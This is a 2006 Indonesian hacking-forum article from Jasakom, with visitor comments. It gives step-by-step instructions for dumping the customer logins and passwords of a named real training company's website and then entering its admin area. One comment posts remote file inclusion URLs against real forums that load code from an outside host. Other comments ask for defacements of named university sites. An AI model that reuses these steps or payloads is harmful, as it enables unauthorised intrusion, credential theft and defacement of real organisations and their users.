Home
Hacking
Tutorial
.NET
IT News
Lain-lain
About Us
FAQ
Penerbitan Buku

Klik untuk join milist Jasakom




 

Jasakom Community - Article
Kelemahan website trustech.org
Date: Wednesday, March 22, 2006    Hits: 2955    By:  maczya   
Artikel ini membahas tentang kelemahan sistem website http://www.trustech.org sebuah perusahaan Computer Career Training and Certification di Cameroon, Headquarter nya di Minnesota USA.


Langsung aja .. nich --->

dalam kasus ini gw menemukan trik memanfaatkan "CustomerID" pada code asp web tersebut.

//-----Begining

pertama: buka google dan cari allinurl:CustomerID=254 (CustomerID nya bisa berapa aja terserah, mungkin ada website lain yang lemah security nya), tapi perhatikan hasil googling ntar ada alamat web "http://www.trustech.org/corporate/Customers/Reports/CUSTOMERRecord.asp?CustomerID=254&s_CustomerID=&s_Last_Name=&s_Login=&"
sebagai hasil pencarian.

kedua: nah kemudian buka alamat web tersebut, nanti muncul halaman CUSTOMER MAINTENANCE, trus isi textbox Customer Type menjadi 'member', nah lalu tekan tombol UPDATE, akan muncul table isi dari database customer mereka lengkap dengan login dan passwordnya.

nah dari sana anda dapat menggunakan salah satu login user untuk masuk ke halaman admin perusahaan tersebut
(http://www.trustech.org/corporate/Buea) untuk masuk ke sistem informasi web mereka.. tapi jangan berbuat jahat ya

//-----End

nah kelemahan ini gw temuin karena baca dari artikel sebelumnya .. and terinspirasi cari kelemahan web lain.
tapi jangan berbuat jahat dengan merusak database mereka..ini cuma buat belajar.Ok # Thanks to teman2 semua
 


by: maczya
 

Source: JASAKOM Information Center
 
1 2
Jasakom Community - Visitor Comment
Nama: chazmier   Tgl: 5/2/2006 11:42:28 PM
Komentar:
goooooooooooots
Nama: chazmier   Tgl: 5/2/2006 11:42:26 PM
Komentar:
goooooooooooots
Nama: chazmier   Tgl: 5/2/2006 11:42:22 PM
Komentar:
goooooooooooots
Nama: savira   Tgl: 5/1/2006 8:16:55 PM
Komentar:
http://www.mannoio.it/newforum/includes/kb_constants.php?module_root_path=http://liz0zim.jino-net.ru/rst? http://www.ilsitodellagiungla.it/forum/includes/kb_constants.php?module_root_path=http://liz0zim.jino-net.ru/rst?
Nama: ifx   Tgl: 4/22/2006 11:58:37 PM
Komentar:
no cry no women,, dari dulu ampe sekarang kok hackingnya pake' vuln port 80 alias web mulu, yang laen emang ngga ada apa!
Nama: mawar selatan   Tgl: 4/10/2006 8:56:58 PM
Komentar:
wanted 1000 dollar. Mohammad Pradityo Soekarno Putro. 72.14.203.104.googlekan. intext:mohammad pradityo
Nama: perwira_jetman   Tgl: 4/7/2006 5:45:02 AM
Komentar:
Mr.S'to, bisa gak nge deface www.polban.ac.id nya? dikit aja dech, cuma logonya doank diganti apa kek, trus kasih tau ke imel gw, OK!
Nama: tomero   Tgl: 4/6/2006 9:06:04 AM
Komentar:
Salam kenal...
Nama: perwira_jetman   Tgl: 4/4/2006 10:46:18 PM
Komentar:
kalo dah nge deface, kirimin kabarnya ke jendral_davis@yahoo.com
Nama: perwira_jetman   Tgl: 4/4/2006 9:16:32 PM
Komentar:
Kok cuma gitu doank seh, bisa gak nembus website www.polban.ac.id minimal nge - de face aja, ok!!!! kalo udah lapor ke gw ya!
Nama: perwira_jetman   Tgl: 4/4/2006 9:11:18 PM
Komentar:
Kok cuma gini doank seh, bisa gak nembus website www.jtk.polban.ac.id minimal nge - de face aja, ok!!!!
Nama: Ritzal   Tgl: 4/2/2006 9:44:28 PM
Komentar:
Anjrit top banget ini gw demen.......................
Nama: Baday_gatha   Tgl: 4/2/2006 5:01:19 AM
Komentar:
Wah bagus banget...eh bisa kasih bocoran nggak tentang kelemahan situs peterpanband.com, terutama tentang login tanpa password. thanks
Nama: ox1n9   Tgl: 4/1/2006 12:24:37 AM
Komentar:
hehehe klo website CMS model beginian,org sedunia bakalan tau.yg mendidik donk seperti sebab akibat PHP-inject seperti itu bisa terjadi,jgn maen instant aza
Nama: urutoraman   Tgl: 3/29/2006 6:10:15 PM
Komentar:
Ngapain sih nembus-nembus cuma buat iseng? Mendingan cari situs laen yang jahat terus diancurin biar ngga bisa berbuat jahat lagi. Situs jahat tu misalnya situs yang mata-matain kegiatan kita
Nama: bro_adee   Tgl: 3/26/2006 5:12:44 PM
Komentar:
to snowbrain =====> SHUT UP & F*** U
Nama: Acetosal   Tgl: 3/25/2006 12:09:49 PM
Komentar:
ngene thok?. makin ancur
Nama: cR45H3R   Tgl: 3/25/2006 12:16:20 AM
Komentar:
yee, artikelnya yg laen kek.klo tutorial nembus web, semua jg bisa bikin.
Nama: th3sn0wbr4in   Tgl: 3/24/2006 11:25:20 AM
Komentar:
Live Is Good
Nama: Barbatov   Tgl: 3/23/2006 2:45:52 AM
Komentar:
Seep! nambah-nambah! oya, lam knal gwe anak baru neech, ajarin tentang hack donk!
1 2

 

© Copyright by Jasakom 2005 All Right Reserved

User Id: *

Password:
* Required Field
User Baru ? Klik di sini
Lupa Password ?
Keyword :
 

Click here to join jasakomdotnet
Klik di sini untuk Join jasakomdotnet




Informasi disini digunakan untuk tujuan pendidikan, Jasakom tidak bertanggung jawab untuk penyalahgunaan informasi yang ada pada web ini. Gunakan segala bentuk informasi disini secara bijak untuk melindungi diri anda sendiri agar  tidak  menjadi korban internet.